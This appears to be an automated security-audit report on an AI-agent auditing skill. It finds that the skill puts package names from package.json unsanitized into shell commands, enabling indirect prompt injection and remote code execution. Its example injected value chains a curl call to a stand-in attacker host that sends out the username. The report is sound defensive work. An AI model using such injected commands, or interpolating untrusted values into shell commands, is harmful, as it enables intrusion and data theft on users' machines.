security-audit
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHCOMMAND_EXECUTIONREMOTE_CODE_EXECUTION
Full Analysis
- [COMMAND_EXECUTION] (HIGH): The skill instructs the agent to run shell commands using variables derived from the files being audited.
- Evidence: In
Phase 1.5.1, the commandnpm view <package-name> versionuses<package-name>frompackage.json. - Vulnerability: If a malicious codebase contains a package name like
lodash; curl http://attacker.com/$(whoami), the agent will execute the injected command when performing the audit. - [REMOTE_CODE_EXECUTION] (HIGH): The lack of sanitization for untrusted inputs (Indirect Prompt Injection) enables remote code execution.
- Ingestion points:
package.json(dependency names), project files (content via grep). - Boundary markers: None. The instructions tell the agent to interpolate values directly into shell strings.
- Capability inventory:
npm view,pnpm info,grep,git ls-files,test -f. - Sanitization: Absent. There are no instructions to escape or validate the strings before shell execution.
- [DATA_EXPOSURE] (LOW): While intended for auditing, the skill identifies and collects sensitive secrets (API keys, tokens). There is no evidence of exfiltration in the current script, but the collection of these secrets increases the risk profile of the agent's environment.
Recommendations
- AI detected serious security threats
Audit Metadata